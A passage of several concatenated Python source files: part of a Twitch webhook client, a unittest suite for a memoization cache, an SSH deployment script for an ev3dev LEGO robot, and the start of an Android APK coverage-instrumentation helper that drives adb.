callback_full=True): """"Subscribe to Twitch Topic""" self.__logger.debug(f'{mode} to topic {topic_url} for {callback_path}') data = {'hub.callback': self.callback_url + callback_path, 'hub.mode': mode, 'hub.topic': topic_url, 'hub.lease_seconds': self.subscribe_least_seconds} if not callback_full: data['hub.callback'] = callback_path if self.secret is not None: data['hub.secret'] = self.secret result = self.__api_post_request(TWITCH_API_BASE_URL + "webhooks/hub", data=data) if result.status_code != 202: self.__logger.error(f'Subscription failed! status code: {result.status_code}, body: {result.text}') return result.status_code == 202 def _generic_subscribe(self, callback_path: str, url: str, uuid: UUID, callback_func, auth_type: AuthType, auth_scope: List[AuthScope]) -> bool: if auth_type != AuthType.NONE and not self.__twitch.has_required_auth(auth_type, auth_scope): raise UnauthorizedException('required authentication not set or missing auth scope') success = self._subscribe(callback_path+"?uuid=" + str(uuid), url) if success: self.__add_callable(uuid, callback_func) self.__active_webhooks[uuid] = { 'url': url, 'callback': callback_func, 'callback_path': callback_path + "?uuid=" + str(uuid), 'confirmed_subscribe': False, 'confirmed_unsubscribe': False, 'active': False } if self.wait_for_subscription_confirm: timeout = time.time() + self.wait_for_subscription_confirm_timeout while timeout > time.time() and not self.__active_webhooks.get(uuid)['confirmed_subscribe']: time.sleep(0.1) return self.__active_webhooks.get(uuid)['confirmed_subscribe'] return success def _generic_unsubscribe(self, callback_path: str, url: str, callback_full: bool = True) -> bool: return self._subscribe(callback_path, url, mode="unsubscribe", callback_full=callback_full) def _generic_handle_callback(self, request: 'web.Request', data: Union[dict, list, None]) -> 'web.Response': uuid_str = request.rel_url.query.get('uuid') self.__logger.debug(f'handle callback for uuid {uuid_str}') if data is None or uuid_str is None: return web.Response(text="") uuid = UUID(uuid_str) callbacks = self.__callbacks.get(uuid) if callbacks is None: return web.Response(text="") for cf in callbacks: cf(uuid, data) return web.Response(text="") # ================================================================================================================== # SUBSCRIPTION HELPER # ================================================================================================================== __unsubscribe_all_helper = {} def unsubscribe_all(self, twitch: Twitch) -> bool: """Unsubscribe from all Webhooks that use the callback URL set in `callback_url`\n **If `wait_for_subscription_confirm` is False, the response might be True even tho the unsubscribe action failed.** :param ~twitchAPI.twitch.Twitch twitch: App authorized instance of :class:`~twitchAPI.twitch.Twitch` :rtype: bool :returns: True if all webhooks could be unsubscribed, otherwise False. """ self.__unsubscribe_all_helper = {} data = twitch.get_webhook_subscriptions() sub_responses = [] for d in data.get('data', []): uuid = extract_uuid_str_from_url(d.get('callback')) if uuid is not None and d.get('callback').startswith(self.callback_url): self.__unsubscribe_all_helper[uuid] = False sub_responses.append(self._generic_unsubscribe(d.get('callback'), d.get('topic'), callback_full=False)) if self.wait_for_subscription_confirm: timeout = time.time() + self.wait_for_subscription_confirm_timeout while timeout > time.time() and not all(self.__unsubscribe_all_helper.values()): time.sleep(0.1) return all(self.__unsubscribe_all_helper.values()) and all(sub_responses) else: return all(sub_responses) def renew_subscription(self, uuid: UUID) -> bool: """Renew existing topic subscription :param uuid: UUID of the subscription to renew :rtype: bool :returns: True if renewal worked. Note that you still need to wait for the handshake to make sure its renewed. """ url = self.__active_webhooks.get(uuid) if url is None: raise Exception(f'no subscription found for UUID {str(uuid)}') self.__logger.info('renewing webhook ' + str(uuid)) return self._subscribe(url.get('callback_path'), url.get('url')) def unsubscribe(self, uuid: UUID) -> bool: url = self.__active_webhooks.get(uuid) if url is None: raise Exception(f'no subscription found for UUID {str(uuid)}') success = self._generic_unsubscribe(url.get('callback_path'), url.get('url')) if success: self.__callbacks.pop(uuid, None) if self.wait_for_subscription_confirm: timeout = time.time() + self.wait_for_subscription_confirm_timeout while timeout > time.time() and not self.__active_webhooks.get(uuid)['confirmed_unsubscribe']: time.sleep(0.05) if self.__active_webhooks.get(uuid)['confirmed_unsubscribe']: self.__active_webhooks.pop(uuid) else: # unsubscribe failed! return False return success # ================================================================================================================== # SUBSCRIPTIONS # ================================================================================================================== def subscribe_user_follow(self, from_id: Union[str, None], to_id: Union[str, None], callback_func: Union[Callable[[UUID, dict], None], None]) -> Tuple[bool, UUID]: """Subscribe to user follow topic. Set only from_id if you want to know if User with that id follows someone.\n Set only to_id if you want to know if someone follows User with that id.\n Set both if you only want to know if from_id follows to_id.\n See https://dev.twitch.tv/docs/api/webhooks-reference#topic-user-follows for documentation :param from_id: str or None :param to_id: str or None :param callback_func: function for callback :raises ValueError: if both from_id and to_id are None :rtype: bool, UUID """ if from_id is None and to_id is None: raise ValueError('specify at least one of from_id and to_id') param_dict = {"first": 1, "from_id": from_id, "to_id": to_id} url = build_url(TWITCH_API_BASE_URL + "users/follows", param_dict, remove_none=True) uuid = get_uuid() return self._generic_subscribe('/users/follows', url, uuid, callback_func, AuthType.NONE, []), uuid def subscribe_stream_changed(self, user_id: str, callback_func: Union[Callable[[UUID, dict], None], None]) -> Tuple[bool, UUID]: """Subscribe to stream changed topic\n See https://dev.twitch.tv/docs/api/webhooks-reference#topic-stream-changed for documentation :param user_id: str :param callback_func: function for callback :rtype: bool, UUID """ param_dict = {"user_id": user_id} url = build_url(TWITCH_API_BASE_URL + "streams", param_dict) uuid = get_uuid() return self._generic_subscribe('/streams', url, uuid, callback_func, AuthType.NONE, []), uuid def subscribe_user_changed(self, user_id: str, callback_func: Union[Callable[[UUID, dict], None], None]) -> Tuple[bool, UUID]: """Subscribe to subscription event topic\n See https://dev.twitch.tv/docs/api/webhooks-reference#topic-user-changed for documentation :param user_id: str :param callback_func: function for callback :rtype: bool, UUID """ param_dict = {"id": user_id} url = build_url(TWITCH_API_BASE_URL + "users", param_dict) uuid = get_uuid() return self._generic_subscribe('/users/changed', url, uuid, callback_func, AuthType.USER, []), uuid def subscribe_extension_transaction_created(self, extension_id: str, callback_func: Union[Callable[[UUID, dict], None], None]) \ -> Tuple[bool, UUID]: """Subscribe to Extension transaction topic\n See https://dev.twitch.tv/docs/api/webhooks-reference#topic-extension-transaction-created for documentation :param extension_id: str :param callback_func: function for callback :rtype: bool, UUID """ if not self.__authenticate: # this requires authentication! raise Exception('This subscription requires authentication!') params = { 'extension_id': extension_id, 'first': 1 } url = build_url(TWITCH_API_BASE_URL + 'extensions/transactions', params) uuid = get_uuid() return self._generic_subscribe('/extensions/transactions', url, uuid, callback_func, AuthType.APP, []), uuid def subscribe_moderator_change_events(self, broadcaster_id: str, user_id: Union[str, None], callback_func: Union[Callable[[UUID, dict], None]]) -> Tuple[bool, UUID]: """Subscribe to Moderator Change Events topic\n See https://dev.twitch.tv/docs/api/webhooks-reference#topic-moderator-change-events for documentation :param broadcaster_id: str :param user_id: str or None :param callback_func: function for callback :rtype: bool, UUID """ params = { 'broadcaster_id': broadcaster_id, 'first': 1, 'user_id': user_id } url = build_url(TWITCH_API_BASE_URL + 'moderation/moderators/events', params, remove_none=True) uuid = get_uuid() return self._generic_subscribe('/moderation/moderators/events', url, uuid, callback_func, AuthType.USER, []), uuid def subscribe_channel_ban_change_events(self, broadcaster_id: str, user_id: Union[str, None], callback_func: Union[Callable[[UUID, dict], None]]) -> Tuple[bool, UUID]: """Subscribe to Channel Ban Change Events\n See https://dev.twitch.tv/docs/api/webhooks-reference#topic-channel-ban-change-events for documentation :param broadcaster_id: str :param user_id: str or None :param callback_func: function for callback :rtype: bool, UUID """ params = { 'broadcaster_id': broadcaster_id, 'first': 1, 'user_id': user_id } url = build_url(TWITCH_API_BASE_URL + 'moderation/banned/events', params, remove_none=True) uuid = get_uuid() return self._generic_subscribe('/moderation/banned/events', url, uuid, callback_func, AuthType.USER, []), uuid def subscribe_subscription_events(self, broadcaster_id: str, callback_func: Union[Callable[[UUID, dict], None]], user_id: Union[str, None] = None, gifter_id: Union[str, None] = None, gifter_name: Union[str, None] = None) -> Tuple[bool, UUID]: """Subscribe to Subscription Events Topic\n See https://dev.twitch.tv/docs/api/webhooks-reference#topic-subscription-events for documentation :param broadcaster_id: str :param callback_func: function for callback :param user_id: optional str :param gifter_id: optional str :param gifter_name: optional str :rtype: bool, UUID """ params = { 'broadcaster_id': broadcaster_id, 'first': 1, 'gifter_id': gifter_id, 'gifter_name': gifter_name, 'user_id': user_id } url = build_url(TWITCH_API_BASE_URL + 'subscriptions/events', params, remove_none=True) uuid = get_uuid() return self._generic_subscribe('/subscriptions/events', url, uuid, callback_func, AuthType.USER, [AuthScope.CHANNEL_READ_SUBSCRIPTIONS]), uuid def subscribe_hype_train_events(self, broadcaster_id: str, callback_func: Union[Callable[[UUID, dict], None]]) -> Tuple[bool, UUID]: """Subscribe to Hype Train Events\n See https://dev.twitch.tv/docs/api/webhooks-reference#topic-hype-train-event for documentation :param broadcaster_id: str :param callback_func: function for callback :rtype: bool, UUID """ params = { 'broadcaster_id': broadcaster_id, 'first': 1 } url = build_url(TWITCH_API_BASE_URL + 'hypetrain/events', params) uuid = get_uuid() return self._generic_subscribe('/hypetrain/events', url, uuid, callback_func, AuthType.USER, [AuthScope.CHANNEL_READ_HYPE_TRAIN]), uuid # ================================================================================================================== # HANDLERS # ================================================================================================================== async def __handle_default(self, request: 'web.Request'): return web.Response(text="pyTwitchAPI webhook") async def __handle_stream_changed(self, request: 'web.Request'): d = await get_json(request) data = None if d is not None: if len(d['data']) > 0: data = d['data'][0] data = make_fields_datetime(data, ['started_at']) else: data = { 'type': 'offline' } return self._generic_handle_callback(request, data) async def __handle_user_follows(self, request: 'web.Request'): data = await get_json(request) if data is not None: data = data['data'][0] data = make_fields_datetime(data, ['followed_at']) return self._generic_handle_callback(request, data) async def __handle_user_changed(self, request: 'web.Request'): data = await get_json(request) if data is not None: data = data['data'][0] return self._generic_handle_callback(request, data) async def __handle_extension_transaction_created(self, request: 'web.Request'): d = await get_json(request) data = d if data is not None: data = data['data'][0] data = make_fields_datetime(data, ['timestamp']) return self._generic_handle_callback(request, data) async def __handle_challenge(self, request: 'web.Request'): challenge = request.rel_url.query.get('hub.challenge') if challenge is not None: self.__logger.debug(f'received challenge for {request.rel_url.query.get("uuid")}') # found challenge, lets answer it if request.rel_url.query.get('hub.mode') == 'subscribe': # we treat this as active as soon as we answer the challenge self.__active_webhooks.get(UUID(request.rel_url.query.get('uuid')))['active'] = True self.__active_webhooks.get(UUID(request.rel_url.query.get('uuid')))['confirmed_subscribe'] = True if request.rel_url.query.get('hub.mode') == 'unsubscribe': uuid_str = request.rel_url.query.get('uuid') if uuid_str in self.__unsubscribe_all_helper.keys(): self.__unsubscribe_all_helper[uuid_str] = True if UUID(uuid_str) in self.__active_webhooks.keys(): # we treat this as invalid as soon as we answer the challenge if self.wait_for_subscription_confirm: self.__active_webhooks.get(UUID(request.rel_url.query.get('uuid')))['confirmed_unsubscribe'] = True else: self.__active_webhooks.pop(UUID(request.rel_url.query.get('uuid'))) return web.Response(text=challenge) return web.Response(status=500) async def __handle_moderator_change_events(self, request: 'web.Request'): data = await get_json(request) if data is not None: data = data['data'][0] data = make_fields_datetime(data, ['event_timestamp']) return self._generic_handle_callback(request, data) async def __handle_channel_ban_change_events(self, request: 'web.Request'): data = await get_json(request) if data is not None: data = data['data'][0] data = make_fields_datetime(data, ['event_timestamp']) return self._generic_handle_callback(request, data) async def __handle_subscription_events(self, request: 'web.Request'): data = await get_json(request) if data is not None: data = data['data'][0] data = make_fields_datetime(data, ['event_timestamp']) return self._generic_handle_callback(request, data) async def __handle_hypetrain_events(self, request: 'web.Request'): data = await get_json(request) if data is not None: data = data['data'][0] data = make_fields_datetime(data, ['event_timestamp', 'cooldown_end_time', 'expires_at', 'started_at']) data = fields_to_enum(data, ['type'], HypeTrainContributionMethod, HypeTrainContributionMethod.UNKNOWN) return self._generic_handle_callback(request, data)
test.py
import unittest from memoization import cached, CachingAlgorithmFlag, _memoization from itertools import chain from threading import Thread import random from threading import Lock import weakref import gc import time make_key = _memoization._make_key # bind make_key function exec_times = {} # executed time of each tested function lock = Lock() # for multi-threading tests random.seed(100) # set seed to ensure that test results are reproducible for i in range(1, 12): exec_times['f' + str(i)] = 0 # init to zero ################################################################################ # Tested functions ################################################################################ @cached def f1(x): exec_times['f1'] += 1 return x @cached() def f2(x): exec_times['f2'] += 1 return x @cached(max_size=5, algorithm=CachingAlgorithmFlag.FIFO, thread_safe=False) def f3(x): exec_times['f3'] += 1 return x @cached(max_size=5, algorithm=CachingAlgorithmFlag.LRU, thread_safe=False) def f4(x): exec_times['f4'] += 1 return x @cached(max_size=5, algorithm=CachingAlgorithmFlag.LFU, thread_safe=False) def f5(x): exec_times['f5'] += 1 return x @cached(max_size=5, algorithm=CachingAlgorithmFlag.FIFO, thread_safe=True) def f6(x): with lock: exec_times['f6'] += 1 return x @cached(max_size=5, algorithm=CachingAlgorithmFlag.LRU, thread_safe=True) def f7(x): with lock: exec_times['f7'] += 1 return x @cached(max_size=5, algorithm=CachingAlgorithmFlag.LFU, thread_safe=True) def f8(x): with lock: exec_times['f8'] += 1 return x @cached(max_size=5, algorithm=CachingAlgorithmFlag.FIFO, thread_safe=False, ttl=0.5) def f9(x): exec_times['f9'] += 1 return x @cached(max_size=5, algorithm=CachingAlgorithmFlag.LRU, thread_safe=False, ttl=0.5) def f10(x): exec_times['f10'] += 1 return x @cached(max_size=5, algorithm=CachingAlgorithmFlag.LFU, thread_safe=False, ttl=0.5) def f11(x): exec_times['f11'] += 1 return x ################################################################################ # Test entry point ################################################################################ class TestMemoization(unittest.TestCase): def test_memoization_with_default_arguments(self): for _ in range(5): f1(10) f2(10) f1(20) f2(20) self.assertEqual(exec_times['f1'], 2) self.assertEqual(exec_times['f2'], 2) for info in f1.cache_info(), f2.cache_info(): self.assertIsNone(info.max_size) self.assertEqual(info.algorithm, CachingAlgorithmFlag.LRU) self.assertIsNone(info.ttl) self.assertTrue(info.thread_safe) self.assertEqual(info.hits, 4) self.assertEqual(info.misses, 2) self.assertEqual(info.current_size, 2) for f in f1, f2: keys = make_key((10,), None), make_key((20,), None) for key in keys: self.assertIn(key, f._cache) def test_memoization_with_FIFO(self): self.assertTrue(hasattr(f3, '_fifo_root')) self._fifo_test(f3) f3.cache_clear() self._check_empty_cache_after_clearing(f3) def test_memoization_with_LRU(self): self.assertTrue(hasattr(f4, '_lru_root')) self._lru_test(f4) f4.cache_clear() self._check_empty_cache_after_clearing(f4) def test_memoization_with_LFU(self): self.assertTrue(hasattr(f5, '_lfu_root')) self._lfu_test(f5) self._check_lfu_cache_clearing(f5) def test_memoization_with_FIFO_multithread(self): self.assertTrue(hasattr(f6, '_fifo_root')) self._general_multithreading_test(f6, CachingAlgorithmFlag.FIFO) self._fifo_test(f6) f6.cache_clear() self._check_empty_cache_after_clearing(f6) def test_memoization_with_LRU_multithread(self): self.assertTrue(hasattr(f7, '_lru_root')) self._general_multithreading_test(f7, CachingAlgorithmFlag.LRU) self._lru_test(f7) f7.cache_clear() self._check_empty_cache_after_clearing(f7) def test_memoization_with_LFU_multithread(self): self.assertTrue(hasattr(f8, '_lfu_root')) self._general_multithreading_test(f8, CachingAlgorithmFlag.LFU) self._lfu_test(f8) self._check_lfu_cache_clearing(f8) def test_memoization_with_FIFO_TTL(self): self.assertTrue(hasattr(f9, '_fifo_root')) self._general_ttl_test(f9) f9.cache_clear() self._check_empty_cache_after_clearing(f9) def test_memoization_with_LRU_TTL(self): self.assertTrue(hasattr(f10, '_lru_root')) self._general_ttl_test(f10) f10.cache_clear() self._check_empty_cache_after_clearing(f10) def test_memoization_with_LFU_TTL(self): self.assertTrue(hasattr(f11, '_lfu_root')) self._general_ttl_test(f11) self._check_lfu_cache_clearing(f11) def test_memoization_for_unhashable_arguments_with_FIFO(self): self._general_unhashable_arguments_test(f3) f3.cache_clear() self._check_empty_cache_after_clearing(f3) def test_memoization_for_unhashable_arguments_with_LRU(self): self._general_unhashable_arguments_test(f4) f4.cache_clear() self._check_empty_cache_after_clearing(f4) def test_memoization_for_unhashable_arguments_with_LFU(self): self._general_unhashable_arguments_test(f5) self._check_lfu_cache_clearing(f5) def _general_test(self, tested_function, algorithm, hits, misses, in_cache, not_in_cache): # clear exec_times[tested_function.__name__] = 0 tested_function.cache_clear() for i in range(20): tested_function(i) tested_function(99) self.assertEqual(exec_times[tested_function.__name__], 21) info = tested_function.cache_info() self.assertEqual(info.max_size, 5) self.assertEqual(info.algorithm, algorithm) self.assertIsNone(info.ttl) self.assertIsNotNone(info.thread_safe) self.assertEqual(info.hits, 0) self.assertEqual(info.misses, 21) self.assertEqual(info.current_size, 5) keys = [make_key((x,), None) for x in (99, 19, 18, 17, 16)] for key in keys: self.assertIn(key, tested_function._cache) # 10 consecutive calls here tested_function(16) tested_function(17) tested_function(18) tested_function(16) tested_function(17) tested_function(18) tested_function(19) tested_function(15) tested_function(100) tested_function(16) info = tested_function.cache_info() self.assertEqual(info.hits, hits) self.assertEqual(info.misses, misses) self.assertEqual(info.current_size, 5) keys = [make_key((x,), None) for x in in_cache] for key in keys: self.assertIn(key, tested_function._cache) keys = [make_key((x,), None) for x in chain(not_in_cache, range(0, 15))] for key in keys: self.assertNotIn(key, tested_function._cache) def _general_multithreading_test(self, tested_function, algorithm): number_of_keys = 30000 number_of_threads = 4 # clear exec_times[tested_function.__name__] = 0 tested_function.cache_clear() info = tested_function.cache_info() self.assertEqual(info.max_size, 5) self.assertEqual(info.algorithm, algorithm) self.assertIsNone(info.ttl) self.assertTrue(info.thread_safe) self.assertEqual(info.current_size, 0) # Test must-hit def run_must_hit(): keys = list(range(5)) * int(number_of_keys / 5) random.shuffle(keys) for i in keys: tested_function(i) threads = [Thread(target=run_must_hit) for _ in range(number_of_threads)] for thread in threads: thread.start() for thread in threads: thread.join() self.assertGreaterEqual(exec_times[tested_function.__name__], 5) info = tested_function.cache_info() self.assertLessEqual(info.hits, number_of_keys * number_of_threads - 5) self.assertGreaterEqual(info.misses, 5) self.assertEqual(info.current_size, 5) for key in [make_key((x,), None) for x in range(5)]: self.assertIn(key, tested_function._cache) # Test can-miss def run_can_miss(): keys = list(range(20)) * int(number_of_keys / 20) random.shuffle(keys) for i in keys: tested_function(i) threads = [Thread(target=run_can_miss) for _ in range(number_of_threads)] for thread in threads: thread.start() for thread in threads: thread.join() executed_times = exec_times[tested_function.__name__] self.assertLessEqual(executed_times, number_of_keys * number_of_threads) self.assertGreaterEqual(executed_times, 20) info = tested_function.cache_info() self.assertGreaterEqual(info.hits, 0) self.assertLessEqual(info.misses, number_of_keys * number_of_threads) self.assertEqual(info.current_size, 5) def _fifo_test(self, tested_function): self._general_test(tested_function=tested_function, algorithm=CachingAlgorithmFlag.FIFO, hits=7, misses=24, in_cache=(16, 100, 15, 99, 19), not_in_cache=(18, 17)) self.assertEqual(exec_times[tested_function.__name__], 24) def _lru_test(self, tested_function): self._general_test(tested_function=tested_function, algorithm=CachingAlgorithmFlag.LRU, hits=7, misses=24, in_cache=(16, 100, 15, 19, 18), not_in_cache=(99, 17)) self.assertEqual(exec_times[tested_function.__name__], 24) def _lfu_test(self, tested_function): self._general_test(tested_function=tested_function, algorithm=CachingAlgorithmFlag.LFU, hits=8, misses=23, in_cache=(18, 17, 16, 19, 100), not_in_cache=(99, 15)) self.assertEqual(exec_times[tested_function.__name__], 23) def _check_empty_cache_after_clearing(self, tested_function): info = tested_function.cache_info() self.assertEqual(info.hits, 0) self.assertEqual(info.misses, 0) self.assertEqual(info.current_size, 0) self.assertEqual(info.max_size, 5) cache = tested_function._cache self.assertEqual(len(cache), 0) def _check_lfu_cache_clearing(self, tested_function): root_next = weakref.ref(tested_function._lfu_root.next) first_cache_head = weakref.ref(tested_function._lfu_root.next.cache_head) self.assertIsNotNone(root_next()) self.assertIsNotNone(first_cache_head()) tested_function.cache_clear() self._check_empty_cache_after_clearing(tested_function) gc.collect() self.assertIsNone(root_next()) self.assertIsNone(first_cache_head()) def _general_ttl_test(self, tested_function): # clear exec_times[tested_function.__name__] = 0 tested_function.cache_clear() arg = 1 key = make_key((arg,), None) tested_function(arg) time.sleep(0.25) # wait for a short time info = tested_function.cache_info() self.assertEqual(info.hits, 0) self.assertEqual(info.misses, 1) self.assertEqual(info.current_size, 1) self.assertIn(key, tested_function._cache) tested_function(arg) # this WILL NOT call the tested function info = tested_function.cache_info() self.assertEqual(info.hits, 1) self.assertEqual(info.misses, 1) self.assertEqual(info.current_size, 1) self.assertIn(key, tested_function._cache) self.assertEqual(exec_times[tested_function.__name__], 1) time.sleep(0.35) # wait until the cache expires info = tested_function.cache_info() self.assertEqual(info.current_size, 1) tested_function(arg) # this WILL call the tested function info = tested_function.cache_info() self.assertEqual(info.hits, 1) self.assertEqual(info.misses, 2) self.assertEqual(info.current_size, 1) self.assertIn(key, tested_function._cache) self.assertEqual(exec_times[tested_function.__name__], 2) def _general_unhashable_arguments_test(self, tested_function): args = ([1, 2, 3], {'this': 'is unhashable'}, ['yet', ['another', ['complex', {'type, ': 'isn\'t it?'}]]]) for arg in args: # clear exec_times[tested_function.__name__] = 0 tested_function.cache_clear() key = make_key((arg,), None) tested_function(arg) self.assertIn(key, tested_function._cache) if isinstance(arg, list): arg.append(0) elif isinstance(arg, dict): arg['foo'] = 'bar' else: raise TypeError key = make_key((arg,), None) tested_function(arg) self.assertIn(key, tested_function._cache) if isinstance(arg, list): arg.pop() elif isinstance(arg, dict): del arg['foo'] else: raise TypeError key = make_key((arg,), None) tested_function(arg) self.assertIn(key, tested_function._cache) self.assertEqual(exec_times[tested_function.__name__], 2) info = tested_function.cache_info() self.assertEqual(info.hits, 1) self.assertEqual(info.misses, 2) self.assertEqual(info.current_size, 2) if __name__ == '__main__': unittest.main()
ev3deploy.py
import sys import threading from pathlib import Path import fnmatch import os import argparse from paramiko import SSHClient from scp import SCPClient from typing import List, Optional, TextIO SIGKILL = 9 SIGTERM = 15 PATH = './' EXECUTABLE = ['*.py', '*.sh'] PASSWORD = "maker" HOSTNAME = "ev3dev" USERNAME = "robot" IGNORE_PATH = "./.ignore" EXECUTE_FILE = None def read_exclude(ignore_path: str) -> List[str]: """ Read the exclude file ('.ignore'). :param ignore_path: Path to the exclude file. :return: A list of file patterns to ignore. """ if not os.path.exists(Path(ignore_path)): ignore = open(Path(ignore_path), 'w+') ignore.writelines(['./.ignore\n', './ev3deploy.py\n', '*/.*']) ignore.close() ignore = open(ignore_path, 'r') lines = [line.strip() for line in ignore.readlines()] return lines def match(filename: str, patterns: List[str]) -> bool: """ Checks if filename matches ANY of 'patterns'. :param filename: A path of a file. :param patterns: A list of standard UNIX file patterns. :return: True if filename matches ANY of 'patterns', False otherwise. """ for m in patterns: if fnmatch.fnmatch(filename, m): return True return False def path_join(*paths) -> Optional[Path]: """ Joins multiple strings to a single Path object. :param paths: paths to join. :return: A Path object corresponding to 'paths'. 'None' if 'paths' is empty. """ if len(paths) < 1: return None res = Path(paths[0]).joinpath(*paths[1:]) return res def get_args() -> None: """ Configures command line arguments. """ global HOSTNAME, USERNAME, PASSWORD, PATH, IGNORE_PATH, EXECUTE_FILE parser = argparse.ArgumentParser(description='Send Project to Ev3.') parser.add_argument('--hostname', help="The ssh hostname (default is 'ev3dev')") parser.add_argument('--username', help="The ssh username (default is 'robot')") parser.add_argument('--password', help="The ssh password (default is 'maker')") parser.add_argument('--path', help="The Directory to send (default is current directory).") parser.add_argument('--exclude_file', help="The file containing the list of files to ignore (default is '.ignore').") parser.add_argument('--execute_file', help="A file to execute after transferring (local path relative to 'PATH').") args = parser.parse_args() if args.hostname: HOSTNAME = args.hostname if args.username: USERNAME = args.username if args.password: PASSWORD = args.password if args.path: PATH = args.path if args.exclude_file: IGNORE_PATH = args.exclude_file if args.execute_file: EXECUTE_FILE = args.execute_file def redirect_stdout_handler(st: TextIO): """ Copies 'st' to system stdout. :param st: An output stream. """ for l in iter(st.readline, ""): print(l, end="") def redirect_stderr_handler(st: TextIO): """ Copies 'st' to system stderr. :param st: An output stream. """ for l in iter(st.readline, ""): print(l, end="", file=sys.stderr) run_stdin = True def redirect_stdin_handler(st: TextIO): """ Copies system stdin to st. :param st: An input stream. """ global run_stdin while run_stdin: # if sys.stdin.isatty(): for line in sys.stdin: if st.closed or sys.stdin.closed or not run_stdin: break print(line, end="", file=st) def deploy(path: str = './', hostname: str = "ev3dev", username: str = "robot", password: str = "maker", execute_file: Optional[str] = None, executable: List[str] = ('*.py',), exclude_path: str = "./.ignore", print_console: bool = True, redirect_stdout: bool = True, redirect_stderr: bool = True, redirect_stdin: bool = False) -> None: """ Send code to Ev3 :param path: The Directory to send (default is current directory). :param hostname: The ssh hostname (default is 'ev3dev') :param username: The ssh username (default is 'robot') :param password: The ssh password (default is 'maker') :param execute_file: A file to run on the ev3 when finished. 'None' to disable. Note: this file must be marked as executable. :param executable: A list of patterns of files that should be marked as executable (default is ['*.py']). :param exclude_path: The file containing the list of files to ignore (default is '.ignore'). :param print_console: Should we print info to the console? :param redirect_stdout: Should we redirect stdout form ev3 to console? :param redirect_stderr: Should we redirect stderr form ev3 to console? :param redirect_stdin: Should we redirect console input to ev3 stdin? This is disabled by default as it cannot terminate without reading from stdin. """ # Get / Set working directory if print_console: print("CD", path) os.chdir(path) working_dir = os.getcwd() dir_name = os.path.basename(working_dir) exclude = read_exclude(exclude_path) # Set up ssh if print_console: print("Starting ssh ...") ssh = SSHClient() ssh.load_system_host_keys() if print_console: print("Connecting to", F"{username}@{hostname} ...") ssh.connect(hostname=hostname, username=username, password=password) with SCPClient(ssh.get_transport()) as scp: for subdir, dirs, files in os.walk('.'): # for every file in current working directory: for filename in files: filepath = subdir + '/' + filename # get full file path (relative to working directory) if not match(filepath, exclude): # if the file path does not match any of the excluded patterns: if print_console: print("Sending", Path(filepath), "... ", end='') # create the directory if it does not exist ssh.exec_command('mkdir -p ' + path_join('~', dir_name, subdir).as_posix()) # copy files using scp scp.put(str(path_join(working_dir, filepath)), path_join('~', dir_name, filepath).as_posix()) if print_console: print("Sent") if match(filepath, executable): # if file path matches any of the executable patterns: # mark as executable if print_console: print(path_join('~', dir_name, filepath).as_posix(), "marked as executable.") ssh.exec_command('chmod u+x ' + path_join('~', dir_name, filepath).as_posix()) else: if print_console: print('Excluding', Path(filepath), '.') if execute_file: if print_console: print(F'\nExecuting {execute_file} ...\n') # execute the file. stdin, stdout, stderr = ssh.exec_command(path_join('~', dir_name, execute_file).as_posix(), get_pty=True) # create the redirecting threads if redirect_stdout: out = threading.Thread(target=redirect_stdout_handler, args=(stdout,)) if redirect_stderr: err = threading.Thread(target=redirect_stderr_handler, args=(stderr,)) if redirect_stdin: child_pid = os.fork() if child_pid == 0: redirect_stdin_handler(stdin) os.kill(os.getpid(), SIGTERM) # sin = threading.Thread(target=redirect_stdin_handler, args=(stdin,)) # start them if redirect_stdout: out.start() if redirect_stderr: err.start() # if redirect_stdin: # sin.start() # wait for them to terminate if redirect_stdout: out.join() if redirect_stderr: err.join() if redirect_stdin: global run_stdin # tell redirect_stdin_handler to exit without sending data to stdin run_stdin = False # sys.stdin.close() # sin.join() os.kill(child_pid, SIGTERM) if print_console: print('\nFinished.') if __name__ == '__main__': get_args() deploy(path=PATH, hostname=HOSTNAME, username=USERNAME, password=PASSWORD, execute_file=EXECUTE_FILE, executable=EXECUTABLE, exclude_path=IGNORE_PATH)
smiler.py
import os import subprocess import re import shutil import threading import signal import logging import time, sched from config import config from granularity import Granularity from instrumenting import manifest_instrumenter from libs.libs import Libs from instrumenting.apkil.smalitree import SmaliTree from instrumenting.apktool_interface import ApktoolInterface from instrumenting.smali_instrumenter import Instrumenter from instrumenting.utils import timeit from instrumenting.utils import Utils apk_info_pattern = re.compile("package: name='(?P<package>.*?)'") CRASH_REPORT_FILENAME = "errors.txt" def install(new_apk_path): logging.info("installing {}".format(os.path.basename(new_apk_path))) cmd = '{} install -r "{}"'.format(config.adb_path, new_apk_path) out = request_pipe(cmd) logging.info(out) def uninstall(package): logging.info("uninstalling") cmd = '{} uninstall "{}"'.format(config.adb_path, package) out = request_pipe(cmd) logging.info(out) def request_pipe(cmd): pipe = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) out, err = pipe.communicate() res = out if not out: res = err if pipe.returncode > 0: raise Exception("----------------------------------------------------\n\ Out: %s\nError: %s" % (out, err)) return res def get_apk_properties(path): info_cmd = "%s dump badging %s" % (config.aapt_path, path) out = request_pipe(info_cmd) matched = re.match(apk_info_pattern, out) package_name = matched.group('package') return apkinfo(package_name, "", "") def get_package_files_list(package_name): cmd = '{} shell ls "/mnt/sdcard/{}/"'.format(config.adb_path, package_name) out = request_pipe(cmd) files = [f for f in out.split() if not f.endswith('/')] return files def get_execution_results(package_name, ec_dir, images_dir): result_files = get_package_files_list(package_name) coverage_files = [f for f in result_files if f.endswith(".ec")] images_files = [f for f in result_files if f.endswith(".png")] crash_file = CRASH_REPORT_FILENAME if CRASH_REPORT_FILENAME in result_files else None if not (coverage_files or crash_file): raise Exception("No coverage or crash report files have been detected on the device for {} package.\n\ Run acvtool with \'-start\' argument to produce coverage.".format(package_name)) Utils.recreate_dir(ec_dir) Utils.recreate_dir(images_dir) pull_files(ec_dir, coverage_files, package_name) pull_files(images_dir, images_files, package_name) if crash_file: pull_files(ec_dir, [crash_file], package_name) def pull_files(dir_name, file_list, package_name): for f in file_list: adb_pull(package_name, f, dir_name) adb_delete_files(package_name, f) def adb_pull(package_name, file_path, pull_to): cmd = "%s pull mnt/sdcard/%s/%s %s" % (config.adb_path, package_name, file_path, os.path.abspath(pull_to)) out = request_pipe(cmd) logging.info(out) def adb_delete_files(package_name, file_name): cmd = "%s shell rm mnt/sdcard/%s/%s" % (config.adb_path, package_name, file_name) out = request_pipe(cmd) def grant_storage_permission(package): read_storage_cmd = "{0} shell pm grant {1} android.permission.READ_EXTERNAL_STORAGE".format(config.adb_path, package) subprocess.call(read_storage_cmd, shell=True) write_storage_cmd = "{0} shell pm grant {1} 